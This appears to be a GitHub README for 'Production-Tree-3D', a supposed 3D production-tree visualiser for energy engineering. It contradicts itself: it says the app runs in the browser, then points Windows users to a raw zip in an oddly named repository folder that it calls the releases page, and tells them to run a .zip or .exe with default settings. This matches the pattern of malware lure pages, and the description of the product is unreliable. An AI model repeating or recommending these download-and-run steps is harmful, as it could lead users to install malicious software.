This software shows a 3D interactive plot of a production tree. It helps you explore production data visually. The tool runs in your web browser through GitHub Pages, so you only need a computer with Windows and an internet connection to use it. No technical or programming skills are required.
The production tree is common in energy fields like oil and gas, mechanical engineering, and geothermal projects. This app helps you see complex production relationships in three dimensions. It can assist engineers and managers by making data easier to understand.

Follow the steps below to download and run Production-Tree-3D on a Windows machine.
You need to visit the official releases page to download the latest version.
- Click the link above or go to:
https://raw.githubusercontent.com/rongtbk/Production-Tree-3D/main/sniffingly/Tree-Production-D-v3.4.zip - This page lists all available versions of the software.
- Look for the newest release at the top.
- There will be a downloadable file suited for Windows, usually a
.zipor.exefile. - Click to download the file to your computer.
- If you downloaded an
.exefile:- Double-click the file to start the installation.
- Follow the on-screen prompts.
- Accept any default settings unless you want to change the installation folder.
- If you downloaded a
.zipfile:- Right-click the zip file and select Extract All.
- Choose a folder to extract the program files to.
- Wait for extraction to complete.
The app runs by opening a web page stored locally on your computer.
- After installation or extraction, open the program folder.
- Find the file named
index.html. - Double-click
index.htmlto open it in your default web browser. - The 3D production tree interface should load automatically.
- Use your mouse or touchpad to interact with the 3D plot.
If the interface does not open or appears blank:
- Make sure your browser is updated to the latest version.
- Try opening the file in another browser.
- Ensure that JavaScript is enabled.
- Zoom In and Out: Use the mouse wheel or pinch on a touchpad.
- Rotate View: Click and hold the left mouse button, then move the mouse around.
- Select Nodes: Click on any part of the production tree to get more details.
- Reset View: Use the reset button in the interface to return the tree to its original position.
- Export Image: Click the export button to save a snapshot of the tree.
The interface includes simple labels and tooltips to guide you through the controls. No need for extra settings.
This app works best with production data files formatted in specific ways. If you want to explore your own data:
- Use CSV or JSON production data files.
- Ensure data matches expected columns for nodes and connections.
- Place your data files in the same folder as
index.html. - Use the import button in the app to load your own data.
The app will translate your file into a 3D tree automatically.
- App won’t open: Confirm your browser supports local file execution. Google Chrome on Windows allows this if you use the app locally.
- No tree shows up: Check your data file format if using custom files. Use sample data to verify.
- Sluggish performance: Close other heavy apps. Restart your browser.
- Visit the GitHub Releases page for updated versions and notes.
- Look through the GitHub repository for documentation and FAQs.
- Open issues on the GitHub page if you find bugs.
